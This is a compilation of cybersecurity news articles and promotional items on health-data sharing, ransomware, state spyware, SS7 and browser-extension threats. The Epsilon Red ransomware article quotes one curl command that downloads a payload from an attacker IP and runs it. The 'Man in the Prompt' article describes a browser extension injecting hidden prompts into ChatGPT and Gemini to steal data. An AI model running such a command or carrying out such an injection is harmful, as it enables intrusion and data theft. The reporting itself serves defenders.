The Trump Administration is working with 60 companies on a plan to have Americans voluntarily upload their healthcare and medical data.

US President Donald Trump announced a loose plan Wednesday to allow Americans to voluntarily upload and port their medical records across hospitals, clinics, technology companies, and health apps, with broad participation from Google, Apple, OpenAI, Amazon, and more.

While the system could help Americans connect disparate pieces of health data currently siloed behind separate companies and healthcare providers, some privacy experts have warned that the data’s segmentation is in fact paramount to its privacy.

“\[This\] private health tracking system w/ Big Tech should worry all Americans,” said Georgetown University professor Lawrence Gostin, who also serves as the Director of the World Health Organization Collaborating Center on National and Global Health Law.

> “There are few privacy safeguards. Medical records are personal \[and\] intimate. Health records might be shared with insurers, businesses, ICE, \[and\] law enforcement.”

But, according to the Trump Administration, being able to more easily share this data is a boon to Americans who want to, say, directly hand their personal Apple Health data to their doctor, or approve certain weight loss providers, like Noom, to obtain access to their medical records.

A total of 60 companies have signed onto the effort, ranging from traditional healthcare insurers such as UnitedHealth to artificial intelligence developers such as Anthropic and OpenAI. The latter group’s participation is part of the Trump Administration’s efforts to roll out AI chatbots that can steer Americans into healthier recommendations for daily living—a goal pushed by Health and Human Services Secretary Robert F. Kennedy following a recent visit to Indonesia.

“There are other apps in Indonesia that allow you to choose good foods when you go to the grocery store and turn your app on on your phone and get information,” Kennedy said at a televised event Wednesday. “Now, if you have your medical records, you can get personalized advice, and that allows you to get better advice about a better alternative.”

Still, the prospect of increasing the accessibility of healthcare data creates new risks.

First, while it is unknown if participating companies can store a person’s data, their access to the new database could make them highly attractive targets for cybercriminals who want to abuse that access to ransack Americans’ sensitive information. Already, third-party companies that support healthcare providers are at high risk for cyberattacks—a reality that nearly gridlocked two ambulance operators after a shared technology provider was attacked.

Further, it’s far too common for companies that already handle medical data to expose private information, like when a radiological imaging provider failed to protect tens of thousands of patient files.  

Second, there is also the question about whether the data will be used in new, privacy-invasive ways to track Americans. Already, Americans’ browsing habits, online searches, clicks, scrolls, opened emails, and shopping wish lists are mined for advertising revenue. As warned by Jeff Chester, executive director for the Center for Digital Democracy in speaking with the AP:

> “This scheme is an open door for the further use and monetization of sensitive and personal health information.”

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Trump Administration and Big Tech want you to share your health data 

Beware of Epsilon Red ransomware as attackers impersonate Discord, Twitch and OnlyFans using fake verification pages with .HTA files and ActiveX to spread malware.

A sophisticated new ransomware campaign is actively tricking internet users around the world by employing fake verification pages to spread a dangerous threat called Epsilon Red malware.

This critical finding is revealed in the latest threat intelligence report by CloudSEK, a leading cybersecurity firm. The ongoing campaign, first spotted in July 2025, uses social engineering in which attackers pretend to be popular online services like Discord, Twitch, and OnlyFans. They trick individuals into downloading malicious .HTA files, which are special HTML Applications that can run scripts directly on a computer.

****Silent Infection Through Browser Vulnerabilities****

According to CloudSec, when a victim lands on one of the fake ClickFix-themed verification pages and interacts with it, malicious commands run in the background without their knowledge.

Image via CloudSec

This happens through ActiveX abuse, a technology that allows interactive content in web browsers. In this attack, the malicious script quietly downloads and runs the Epsilon Red ransomware from a hidden location, bypassing normal security checks.

CloudSEK’s analysis shared with Hackread.com revealed commands curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe, that download and execute the ransomware without the user seeing a typical download window.

A fake verification message is then displayed, misleading the user into thinking everything is normal. Notably, there’s a small typo in the fake message, “Verificatification,” which might be an intentional detail to appear less suspicious.

CloudSEK’s TRIAD team, responsible for this discovery, noted that, unlike older versions of similar attacks that simply copied harmful commands to a clipboard, this new variant pushes victims to a second page where the infection happens without any clear warning.

The infrastructure supporting this campaign includes several fake domains and IP addresses designed to look like legitimate services, including a fake Discord Captcha Bot. They also found some dating or romance-themed lure pages. Additionally, another malware, a Quasar RAT, was linked to this campaign, indicating potential for remote control alongside ransomware.

****Understanding Epsilon Red and Protection Steps****

Epsilon Red ransomware, first seen in 2021, leaves ransom notes that look a bit like those from the well-known REvil ransomware, though the two are otherwise distinct in how they operate. This highlights a trend where different ransomware groups might borrow elements from each other.

To protect against this new threat, CloudSEK recommends several key steps. Users should disable ActiveX and Windows Script Host (WSH) through their computer’s settings to block these types of script executions. Organisations should also use threat intelligence feeds to immediately block known attacker IP addresses and domains, such as twtichcc and 155.94.155227:2269.

Furthermore, endpoint security tools should be set up to detect unusual hidden activities, like programs running silently from web browsers. Finally, continuous security awareness training is crucial, teaching users to recognise and avoid fake verification pages and social engineering attempts, even if they impersonate familiar online platforms.

OnlyFans, Discord ClickFix-Themed Pages Spread Epsilon Red Ransomware

The FSB cyberespionage group known as Turla seems to have used its control of Russia's network infrastructure to meddle with web traffic and trick diplomats into infecting their computers.

The Russian state hacker group known as Turla has carried out some of the most innovative hacking feats in the history of cyberespionage, hiding their malware's communications in satellite connections or hijacking other hackers' operations to cloak their own data extraction. When they're operating on their home turf, however, it turns out they've tried an equally remarkable, if more straightforward, approach: They appear to have used their control of Russia's internet service providers to directly plant spyware on the computers of their targets in Moscow.

Microsoft's security research team focused on hacking threats today published a report detailing an insidious new spy technique used by Turla, which is believed to be part of the Kremlin's FSB intelligence agency. The group, which is also known as Snake, Venomous Bear, or Microsoft's own name, Secret Blizzard, appears to have used its state-sanctioned access to Russian ISPs to meddle with internet traffic and trick victims working in foreign embassies operating in Moscow into installing the group's malicious software on their PCs. That spyware then disabled encryption on those targets' machines so that data they transmitted across the internet remained unencrypted, leaving their communications and credentials like usernames and passwords entirely vulnerable to surveillance by those same ISPs—and any state surveillance agency with which they cooperate.

Sherrod DeGrippo, Microsoft's director of threat intelligence strategy, says the technique represents a rare blend of targeted hacking for espionage and governments' older, more passive approach to mass surveillance, in which spy agencies collect and sift through the data of ISPs and telecoms to surveil targets. “This blurs the boundary between passive surveillance and actual intrusion,” DeGrippo says.

For this particular group of FSB hackers, DeGrippo adds, it also suggests a powerful new weapon in their arsenal for targeting anyone within Russia's borders. “It potentially shows how they think of Russia-based telecom infrastructure as part of their toolkit,” she says.

According to Microsoft's researchers, Turla's technique exploits a certain web request browsers make when they encounter a “captive portal,” the windows that are most commonly used to gate-keep internet access in settings like airports, airplanes, or cafes, but also inside some companies and government agencies. In Windows, those captive portals reach out to a certain Microsoft website to check that the user's computer is in fact online. (It's not clear whether the captive portals used to hack Turla's victims were in fact legitimate ones routinely used by the target embassies or ones that Turla somehow imposed on users as part of its hacking technique.)

By taking advantage of its control of the ISPs that connect certain foreign embassy staffers to the internet, Turla was able to redirect targets so that they saw an error message that prompted them to download an update to their browser's cryptographic certificates before they could access the web. When an unsuspecting user agreed, they instead installed a piece of malware that Microsoft calls ApolloShadow, which is disguised—somewhat inexplicably—as a Kaspersky security update.

That ApolloShadow malware would then essentially disable the browser's encryption, silently stripping away cryptographic protections for all web data the computer transmits and receives. That relatively simple certificate tampering was likely intended to be harder to detect than a full-featured piece of spyware, DeGrippo says, while achieving the same result.

“It's a creative approach: ‘What if we just got on the ISP they’re connecting through and use that control to turn off encryption?'" she says, describing what she believes to be Turla's thinking. “This path gives them a massive amount of plaintext traffic that can likely be used for espionage purposes, because it's coming from highly sensitive individuals and organizations like embassies and diplomatic missions.”

The details of how Turla's ISP-based redirection technique works remain far from clear. But Microsoft writes in its report that it likely uses the Kremlin's SORM system for ISP- and telecom-based communications interception and surveillance, a decades-old system initially created by the FSB and now widely used in Russian domestic intelligence and law enforcement.

Microsoft declined to comment on which countries' embassies in Moscow were targeted in the campaign or how many there were, though DeGrippo notes that Microsoft warned the victims it identified. Turla's use of Kaspersky software as a cover for its malware installation technique suggests that the US embassy may not have been a target, given that Kaspersky software is banned on US government systems. Microsoft declined to comment on whether the US embassy was targeted.

Microsoft didn't say how it had linked the hacking campaign to Turla specifically—a typical tightlipped approach from the company's security team, which often declines to divulge its sources and methods to avoid helping hackers evade detection. “This is a threat actor that we have watched closely for a very long time,” DeGrippo says.

Turla has a decades-old a reputation for innovating hacking methods, from USB-based worms designed to penetrated air-gapped systems to piggybacking on cybercriminals' botnets—and ApolloShadow likely isn't the first time the group has hijacked ISPs to plant malware. Slovakian cybersecurity firm ESET has pointed to what may have been a similar technique used to infect victims with fake Flash installers. The same company has also documented what it believed was likely a similar trick likely used by the Belarusian KGB's hackers, and how the commercial spyware FinFisher was likely installed on targets' devices using that same ISP-level access. But Turla's latest campaign would represent the first time that ISP-based infection has been used to disable encryption on target computers, a potentially stealthier form of espionage.

Microsoft's DeGrippo notes that Turla's technique is effective in part because it doesn't take advantage of any particular software vulnerability, so it can't be patched. “It doesn't leverage any zero-day or other vulnerability,” DeGrippo says. “It's about getting onto the network infrastructure your target is using and controlling things from there.”

That said, there are defenses Microsoft recommends for potential victims of Turla's style of ISP-based espionage technique: Use a VPN, for instance, to shield your internet traffic from your internet service provider, or even a satellite connection to bypass an untrusted ISP altogether. Multifactor authentication, too, can limit hackers' access even when they've successfully stolen a victim's username and password.

DeGrippo argues that Turla's use of the technique for domestic spying inside Russia should serve as a warning to anyone traveling, living, or working in a country that has untrusted communications infrastructure. Similar ISP-level hacking, she notes, could easily be adopted by other cyberespionage groups around the world and used anywhere national internet and telecom infrastructure are potentially bent to the will of that country's intelligence agencies.

“If you're a target of interest traveling or working in countries that have these state-aligned ISPs that perhaps have surveillance powers or lawful intercept capabilities,” DeGrippo says, “you need to concern yourself with this.”

The Kremlin's Most Devious Hacking Group Is Using Russian ISPs to Plant Spyware

Researchers identify a new SS7 encoding attack used by a surveillance vendor to bypass security and access mobile subscriber data without detection.

Mobile networks are facing a new cybersecurity headache as researchers reveal a new way attackers are bypassing SS7 protections. The research, detailed by the Enea threat intelligence titled “The Good, the Bad, and the Encoding,” explains how attackers are using encoding methods to bypass security and carry out exploits without being detected.

SS7, or Signaling System 7, is the decades-old protocol that allows mobile carriers to connect calls, send text messages, and manage roaming between networks. While it underpins global telecommunications, it was never designed with modern security in mind.

Despite ongoing efforts to patch and monitor SS7 traffic, attackers continue to find ways to exploit its vulnerabilities. Enea’s findings show how encoding manipulation can be used to bypass standard detection techniques, giving cybercriminals a chance to intercept communications or conduct malicious activities.

According to researchers, the real problem is how the attack can happen without drawing attention. For example, by adjusting the way messages are encoded, malicious traffic can appear harmless to existing SS7 firewalls and monitoring tools. In practice, this means suspicious activity can slip through without raising immediate alarms, leaving operators exposed to threats like data interception, call rerouting, and location tracking.

****Evidence of Exploitation****

Enea’s researchers found evidence that a surveillance vendor has already used this exact encoding technique in the wild. The attack, which first appeared in late 2024, was used to request mobile subscriber location data from certain operators.

According to researchers, the attackers were able to hide key fields from detection systems by tweaking how specific signaling messages were formatted, allowing the request to go through without being blocked or flagged.

_“_The source of the attacks matched a surveillance company that we have tracked for many years, and we believe that this was identified and used by them,_“_ the company said. _“_We don’t have any information on how successful this attack method has been worldwide, as its success is vendor/software specific, rather than being a general protocol vulnerability, but its use as part of a suite indicates that it has had some value._“_

Enea’s researchers warn that the issue persists because SS7 remains widely in use for roaming and interoperability, even as newer technologies like Diameter and 5G signaling gain ground. Completely abandoning SS7 is not an option for most mobile operators, so network defenders must take a different approach to mitigate these threats.

The company advises operators to monitor irregular encoding patterns, strengthen their signaling firewalls, and combine threat intelligence with behavioural analytics to detect bypass attempts early.

Researchers Link New SS7 Encoding Attack to Surveillance Vendor Activity

Man in the Prompt attack shows how browser extensions can exploit ChatGPT, Gemini and other AI tools to steal data or inject hidden prompts.

A new cyberattack method, dubbed Man in the Prompt, has been identified, allowing malicious actors to exploit common browser extensions to inject harmful instructions into leading generative AI tools like ChatGPT, Google Gemini, and others. This critical finding comes from a recent threat intelligence report by cybersecurity research firm LayerX.

According to researchers, it all starts with how most AI tools function within web browsers. Their prompt input fields are part of the web page’s structure (known as the Document Object Model, or DOM). This means that virtually any browser extension with basic scripting access to the DOM can read or alter what users type into AI prompts, even without requiring special permissions.

Browser-based AI applications using LLMs are especially affected (Source: LayerX)

****How the Attack Works and Who is At Risk****

Bad actors can use compromised or outright malicious extensions to carry out various harmful activities. These include manipulating a user’s input to the AI, secretly injecting hidden instructions, extracting sensitive data from AI responses or the entire session, and even tricking the AI model into revealing confidential information or performing unintended actions. Essentially, the browser becomes a conduit, allowing the extension to act as a “man in the middle” for AI interactions.

Attack Scenario Explained (Source: LayerX)

The risk is significant because browser-based AI tools often process sensitive information. Users may paste confidential company data into these interfaces, and some internal AI applications trained on proprietary datasets can be exposed if browser extensions interfere with or extract content from the prompt or response fields.

The ubiquity of browser extensions, coupled with the fact that many organisations allow free installation, means a single vulnerable extension can provide an attacker with a silent pathway to steal valuable corporate knowledge.

> _“The exploit has been tested on all top commercial LLMs, with proof-of-concept demos provided for ChatGPT and Google Gemini. The implication for organisations is that as they grow increasingly reliant on AI tools, that these LLMs, especially those trained with confidential company information, can be turned into ‘hacking copilots’ to steal sensitive corporate information.”_
> 
> LayerX

LayerX demonstrated proof-of-concept attacks against major platforms. For ChatGPT, an extension with minimal declared permissions could inject a prompt, extract the AI’s response, and remove chat history from the user’s view to reduce detection.

For Google Gemini, the attack exploited its integration with Google Workspace. Even when the Gemini sidebar was closed, a compromised extension could inject prompts to access and exfiltrate sensitive user data, including emails, contacts, file contents, and shared folders.

Google was informed about this specific browser extension vulnerability by LayerX. Check out this exploit’s demo here:

****Mitigating the Novel Threat****

This attack creates a blind spot for traditional security tools like endpoint Data Loss Prevention (DLP) systems or Secure Web Gateways, as they lack visibility into these DOM-level interactions. Blocking AI tools by URL alone also won’t protect internal AI deployments.

LayerX advises organisations to adjust their security strategies towards inspecting in-browser behaviour. Key recommendations include monitoring DOM interactions within AI tools to detect suspicious activity, blocking risky extensions based on their behaviour rather than just their listed permissions, and actively preventing prompt tampering and data exfiltration in real-time at the browser layer.

Mayank Kumar, Founding AI Engineer at DeepTempo, highlighted the broader implications of this new attack vector in his comment shared with Hackread.com. “The pressure to integrate generative AI is real,” he observed, noting that organisations widely adopt models like ChatGPT and Gemini for productivity gains. However, he warned, this rapid adoption is “severely testing the security infrastructure built in the pre-GenAI era.”

Kumar emphasised that attacks like “Man in the Prompt” highlight the critical need to rethink security for the interfaces where proprietary data, AI tools, and third-party integrations like browser extensions interact. He stated, “Prompts are not just text, they are interfaces.” This new reality means securing not just the AI model, but the entire data journey through potentially vulnerable browser environments.

Kumar advocates for going “beyond surface-level protection” by implementing deep-layer network monitoring. By looking for anomalies in network traffic correlated with AI tool interactions, organisations can detect suspicious activities, such as unusual data leaving the network or unexpected communications, even when hidden within seemingly legitimate AI prompts. This layered approach, combining application awareness with strict network scrutiny, is vital to counter this new wave of AI-driven cyber threats.

Browser Extensions Can Exploit ChatGPT, Gemini in ‘Man in the Prompt’ Attack

Cybersecurity trends in 2025 reveal rising AI threats, quantum risks, and supply chain attacks, pushing firms to adapt or face major data and financial losses.

The cybersecurity world isn’t just changing, it’s getting a complete makeover. With approximately 600 million cyberattacks per day in 2025, translating to 54 victims every second, the stakes have never been higher. If you’re running a business in 2025, cybersecurity isn’t some back-burner IT concern anymore. It’s your digital lifeline.

Whether you’re launching a startup that needs to search for a Domain or protecting an enterprise that’s weathered every tech storm since Y2K, understanding this year’s cybersecurity shifts isn’t optional; it’s survival.

****AI: The Ultimate Double Agent****

Artificial intelligence has officially entered its villain era, and it’s bringing some serious heat. Criminals are using AI for sophisticated attacks, crafting adaptive malware, launching real-time phishing campaigns, and creating convincing deepfakes that could fool your mother.

Here’s the kicker: The number of deepfakes is projected to reach 8 million in 2025, up from 500,000 in 2023. That’s a 1,500% increase in fake content that’s getting harder to spot every day.

****The AI Arms Race Gets Personal****

But AI isn’t just playing for the dark side. Defenders are integrating AI for advanced anomaly detection, rapid threat hunting, and automated response. It’s like having a digital security guard that never sleeps, never gets distracted, and processes threats faster than any human team ever could.

The real game-changer? Security operations centers are using AI for big data analysis of logs, rapid anomaly detection, and automated containment procedures, reducing breach window times and cutting manual analyst workloads.

****Zero Trust: The “Trust No One” Revolution****

Remember when your office network was like a medieval castle, hard shell, soft center? Those days are dead than Internet Explorer. Organisations are adopting zero trust models, which continuously verify users and devices.

****Why the Rush to Zero Trust?****

Because micro-segmentation, user context checks, and continuous session monitoring are becoming industry standards, it reduces the risks of lateral movement by attackers. Think of it as giving every user their own personal security bubble instead of one big group hug.

The momentum is real: Continuous validation of access rights and micro-segmentation are standard across cloud apps, IoT systems, and remote endpoints, offering layered protection that works.

****Quantum Computing: The Storm That’s Coming****

Let’s talk about the elephant in the server room. Quantum computing isn’t science fiction anymore; it’s a ticking time bomb for current encryption methods. Security experts predict that quantum computing poses a significant potential threat, especially for breaking contemporary encryption.

****The Post-Quantum Panic****

Here’s what keeps security experts awake: quantum computers could theoretically crack today’s encryption in hours instead of the billions of years it would take conventional computers. Organisations are beginning to explore post-quantum cryptography to protect sensitive data.

The urgency is real because adversaries aren’t waiting. They’re already collecting encrypted data now, planning to decrypt it once quantum computers become viable. It’s called “harvest now, decrypt later,” and it’s happening right now.

****Ransomware Gets a Business Model Makeover****

Ransomware isn’t just malware anymore; it’s a full-blown industry. The ransomware economy has grown, with attack toolkits available for purchase and use by less-skilled criminals. It’s like Uber for cybercrime, except everyone loses.

****The Numbers Don’t Lie****

Nearly 60% of businesses have faced ransomware attacks in the past year, and North America has seen an 8% increase in such attacks. The financial hit? The typical ransomware recovery averages $2.73 million.

But here’s the twist: Supply chain breaches, especially via third-party vendors and software dependencies, continue to surge, prompting more real-time monitoring and contractual cybersecurity demands.

****Supply Chain Attacks: The Domino Effect Nobody Saw Coming****

Your business is only as secure as your weakest vendor, and that’s becoming a serious problem. By 2025, 45% of global organisations are expected to have faced a software supply chain attack.

****The Ripple Effect****

When one vendor gets compromised, it doesn’t just affect them; it creates a domino effect across their entire customer base. Think SolarWinds, but happening more frequently and with less fanfare.

****Cloud Security: The New Wild West****

As businesses migrate to the cloud faster than you can say “digital transformation,” new attack surfaces are exposed through misconfigurations or unpatched images. Embedding security “shift-left” into DevOps is now critical.

****The Multi-Cloud Challenge****

Here’s where it gets tricky: most companies aren’t just using one cloud provider. They’re juggling AWS, Azure, Google Cloud, and private data centers like a digital circus act. Each platform has unique configurations, logs, and policy frameworks, making consistent threat visibility nearly impossible.

****The Human Factor: Still the Biggest Wild Card****

Despite all the tech advances, humans remain the weakest link in the security chain. The “hybrid workforce”, remote, contracted, or third-party, magnifies insider threats, necessitating behavioural analytics and strong identity management.

****Authentication Gets an Upgrade****

Advanced authentication through biometrics and continuous monitoring minimises credential-based threats across distributed environments. It’s not just about what you know anymore; it’s about who you are, where you are, and how you normally behave.

****The Money Trail: Following the Cybersecurity Budget****

Here’s the reality check: Global cybercrime costs are projected to hit $10.5 trillion in annual damages by 2025. That’s not a typo, trillion with a T.

****Investment Response****

The good news? 85% of organisations plan to increase cybersecurity budgets, with spend projected to grow at a 12.2% annual rate, topping $377 billion globally by 2028.

The bad news? The global shortage of skilled cybersecurity professionals continues, slowing the adoption of advanced tools across smaller enterprises.

****Data Breaches: The Expensive Reality****

Let’s talk numbers that hurt: IBM reports the global average cost of a data breach rose to $4.88 million in 2024 and continues climbing. For IoT devices specifically, the average cost of a successful attack is over $330,000.

****Identity Fraud Explosion****

Identity fraud losses reached $27.2 billion in 2024, up 19% from the previous year. Your data isn’t just valuable, it’s becoming the digital equivalent of gold.

****The Regulatory Response: Compliance Gets Serious****

Governments worldwide are responding to the escalating threat with stricter regulations. New laws mandate stronger incident reporting, data protection, and resilience, influencing risk management strategies globally.

****What This Means for Your Business****

The cybersecurity world of 2025 isn’t about perfect protection; it’s about smart adaptation. Cybersecurity requirements are embedded early in the software development lifecycle, from DevOps pipelines to ongoing vulnerability management.

****The New Security Mindset****

Organisations implement CSMA frameworks for modular, integrated controls across varied systems, improving visibility and control in decentralised environments. It’s not about building higher walls, it’s about building smarter defences.

The winners in 2025 won’t be the companies with the most expensive security tools. They’ll be the ones who understand that cybersecurity is a business strategy, not just a technical challenge. They’ll invest in their people, stay flexible with their defences, and never stop learning.

Because in cybersecurity, the moment you think you’ve figured it out is the moment someone’s already figured out how to beat you.

****Frequently Asked Questions****

**Q: How much should my company budget for cybersecurity in 2025?** A: With 85% of organisations planning to increase cybersecurity budgets, most experts recommend allocating 10-15% of your IT budget to cybersecurity. The actual amount depends on your industry risk level and current security maturity.

**Q: Is AI more helpful or harmful for cybersecurity?** A: It’s genuinely both. While criminals are using AI for sophisticated attacks, defenders are integrating AI for advanced anomaly detection and rapid threat hunting. The key is staying ahead of the curve.

**Q: Should small businesses worry about quantum computing threats?** A: Not immediately, but start planning now. Organisations are beginning to explore post-quantum cryptography, and early preparation will be cheaper than emergency migration later.

**Q: What’s the biggest cybersecurity mistake companies make?** A: Treating cybersecurity as purely a technology problem instead of a business risk. The “hybrid workforce” magnifies insider threats, requiring behavioural analytics and strong identity management. It’s about people, not just tools.

**Q: How quickly are supply chain attacks increasing?** A: Rapidly. By 2025, 45% of global organisations are expected to have faced a software supply chain attack. It’s not a matter of if, but when your supply chain will be targeted.

Cybersecurity Trends 2025: What’s Really Coming for Your Digital Defenses

Cisco Talos is back at Black Hat with new research, threat detection overviews and opportunities to connect with our team. Whether you're interested in what we’re seeing in the threat landscape, detection engineering or real-world incident response, here's where and how to find us.

Wednesday, July 30, 2025 06:00

Cisco Talos is back at Black Hat with new research, threat detection overviews and opportunities to connect with our team. Whether you're interested in what we’re seeing in the threat landscape, detection engineering or real-world incident response, here's where and how to find us: 

**Visit us at the Cisco booth: 2726 **

We’ll have short, 15-minute booth talks throughout Wednesday and Thursday of Black Hat, with topics including: 

*   Talos Vulnerability Discovery Year in Review 
*   How to: Threat Intel 
*   Full Metal SnortML: Accelerating Machine Learning based Firewalls with FPGAs 
*   From CVE to Detection: A Rule Writer's Journey Through Modern Threats 

We also have these sessions as part of the wider conference agenda: 

**Lunch & Learn: Backdoors & Breaches **

**Lagoon KL, Level 2 | Wednesday, Aug 6, 12:05–1:30 PM**    
**Speaker: Joe Marshall** 

Join Joe and members of Talos as we discuss and develop incident response plans in real-time. We’ll use real scenarios over a game of Backdoors & Breaches, an incident response card game developed by Black Hills Information Security. Members from Talos Threat Intelligence will lead tables through the game over lunch and discuss recent threat trends. 

**Reserve your spot here** 

**Mandalay Bay I | Wednesday, Aug 6, 11:20–12:10 PM**    
**Speaker: Nick Biasini** 

Nick will explore how generative AI is shaping today’s threat landscape, from attackers using AI to enhance operations, to malware posing as AI tools, to efforts targeting the models themselves. The session will also cover how organizations can safely adopt GAI while defending against its misuse. 

**Learn more here** 

**Threat Briefing: ReVault! Compromised by Your Secure SoC **

**Oceanside C, Level 2 |  Wednesday, Aug 6, 10:20–11:00 AM**   
**Speaker: Philippe Laulheret** 

This talk introduces ReVault, a vulnerability affecting a widely used embedded security chip. Philippe will demonstrate how a low-privilege user can exploit the flaw to extract sensitive data, gain persistence at the firmware level, and compromise the host system.  

Learn more here 

**Visit the Splunk Booth: Threat Hunters Cookbook Launch **

**Splunk Booth 3046**

Our colleagues at Splunk will be launching their brand new _Threat Hunters Cookbook_ in hard copy. We’ve had a sneak preview, and trust us, this is a brilliant resource for those who want to use modelling and machine learning to conduct threat hunts that really get the best out of your efforts.  

If you're at the show, we’d love to hear what you’re working on, so stop by the Cisco booth (and grab yourself a Snorty while you’re at it). See you in Vegas!

Cisco Talos at Black Hat 2025: Briefings, booth talks and what to expect

This week on the Lock and Code podcast, we revisit an interview with Joseph Cox about the largest FBI sting operation ever carried out.

_This week on the Lock and Code podcast…_

For decades, digital rights activists, technologists, and cybersecurity experts have worried about what would happen if the US government secretly broke into people’s encrypted communications.

The weird thing, though, is that, in 2018, it already happened. Sort of.

US intelligence agencies, including the FBI and NSA, have long sought what is called a “backdoor” into the secure and private messages that are traded through platforms like WhatsApp, Signal, and Apple’s Messages. These applications all provide what is called “end-to-end encryption,” and while the technology guarantees confidentiality for journalists, human rights activists, political dissidents, and everyday people across the world, it also, according to the US government, provides cover for criminals.

But to access any single criminal or criminal suspect’s encrypted messages would require an entire reworking of the technology itself, opening up not just one person’s communications to surveillance, but everyone’s. This longstanding struggle is commonly referred to as The Crypto Wars, and it dates back to the 1950s during the Cold War, when the US government created export control regulations to protect encryption technology from reaching outside countries.

But several years ago, the high stakes in these Crypto Wars became somewhat theoretical, as the FBI gained access to the communications and whereabouts of hundreds of suspected criminals, and they did it without “breaking” any encryption whatsover.

It all happened with the help of Anom, a budding company behind an allegedly “secure” phone that promised users a bevy of secretive technological features, like end-to-end encrypted messaging, remote data wiping, secure storage vaults, and even voice scrambling. But, unbeknownst to Anom’s users, the entire company was a front for law enforcement. On Anom phones, every message, every photo, every piece of incriminating evidence, and every order to kill someone, was collected and delivered, in full view, to the FBI.

Today, on the Lock and Code podcast with host David Ruiz, we revisit a 2024 interview with 404 Media cofounder and investigative reporter Joseph Cox about the wild, true story of Anom. How did it work, was it “legal,” where did the FBI learn to run a tech startup, and why, amidst decades of debate, are some people ignoring the one real-life example of global forces successfully installing a backdoor into a company?

> The public…and law enforcement, as well, \[have\] had to speculate about what a backdoor in a tech product would actually look like. Well, here’s the answer. This is literally what happens when there is a backdoor, and I find it crazy that not more people are paying attention to it.

Tune in today to listen to the full conversation.

**Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.**

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

 How the FBI got everything it wanted (re-air) (Lock and Code S06E15) 

Palo Alto, California, 29th July 2025, CyberNewsWire

**Palo Alto, California, July 29th, 2025, CyberNewsWire**

Despite the expanding use of browser extensions, the majority of enterprises and individuals still rely on labels such as “Verified” and “Chrome Featured” provided by extension stores as a security indicator. The recent Geco Colorpick case exemplifies how these certifications provide nothing more than a false sense of security – Koi Research disclosed 18 malicious extensions that distributed spyware to 2.3M users, with most bearing the well-trusted “Verified” status.

SquareX researchers disclosed the technological reason behind this vulnerability, highlighting an architectural flaw in Browser DevTools that prevents browser vendors and enterprises from performing the thorough security analysis many enterprises expect.

> “Aside from the fact that thousands of extension updates and submissions are being made daily, it is simply impossible for browser vendors to monitor and assess an extension’s security posture at runtime,” says Nishant Sharma, Head of Security Research at SquareX, “This is because existing DevTools were designed to inspect web pages. Extensions are complex beasts that can behave dynamically, work across multiple tabs and have “superpowers” that allow them to easily bypass detection via rudimentary Browser DevTool telemetry.”

In other words, even if browser vendors were not inundated by the sheer quantity of extension submission requests, the architectural limitations of Browser DevTools today would still allow numerous malicious extensions to pass DevTool based security inspections. 

Browser DevTools were introduced in the late 2000s, long pre-dating the widespread extension adoption. These tools were invented to help users and web developers debug websites and inspect web page elements. However, browser extensions have unique capabilities to, among others, modify, take screenshots and inject scripts into multiple web pages, which cannot be easily monitored and attributed by Browser DevTools. For example, an extension may make a network request through a web page by injecting a script into the page. With Browser DevTools, there is no way to differentiate network requests made by the web page itself and those by an extension.

Detailed in the technical blog, SquareX’s researchers propose a novel approach that uses the combination of a modified browser and Browser AI Agents to plug this gap. The modified browser exposes critical telemetry required to understand an extension’s true behavior, while the Browser AI Agent simulates different user personas to incite various extension behaviors at runtime for monitoring and security analysis. This not only allows a dynamic analysis of the extension, but also discoveries of various “hidden” extension behaviors that are only triggered by time, a certain user action or device environments. Named the Extension Monitoring Sandbox, the research details the necessary modifications required for the modified browser. 

The revelation of Browser DevTools’ architectural limitations exposes a fundamental security gap that has led to millions of users being compromised. As browser extensions become a core part of the enterprise workflow, it is critical for enterprises to move from superficial labels to solutions specifically designed to tackle extension security. It is absolutely critical for browser vendors, enterprises and security vendors to work closely together in tackling what has become one of the fastest emerging threat vectors.

This August, SquareX is offering a free enterprise-wide extension audit in August. The audit involves conducting an extensive audit of all extensions installed across the organization using all three components of the SquareX Extension Analysis Framework – metadata analysis, static code analysis and dynamic analysis with the Extension Monitoring Sandbox – providing a full analysis of the organization’s extension risk exposure and a risk score for each extension.

**About** **SquareX**

SquareX’s browser extension transforms any browser on any device into an enterprise-grade secure browser. SquareX’s industry-first Browser Detection and Response (BDR) solution empowers organizations to proactively detect, mitigate, and threat-hunt client-side web attacks including malicious browser extensions, advanced spearphishing, browser-native ransomware, GenAI data loss prevention, and more.

Unlike legacy security approaches and cumbersome enterprise browsers, SquareX seamlessly integrates with users’ existing consumer browsers, ensuring enhanced security without compromising user experience or productivity. By delivering unparalleled visibility and control directly within the browser, SquareX enables security leaders to reduce their attack surface, gain actionable intelligence, and strengthen their enterprise cybersecurity posture against the newest threat vector – the browser.

More information available at: sqrx.com

**Reference**

http://www.bleepingcomputer.com/news/security/malicious-chrome-extensions-with-17m-installs-found-on-web-store/

**Contact**

**Head of PR**  
**Junice Liew**  
**SquareX**  
**\[email protected\]**

Tag

#intel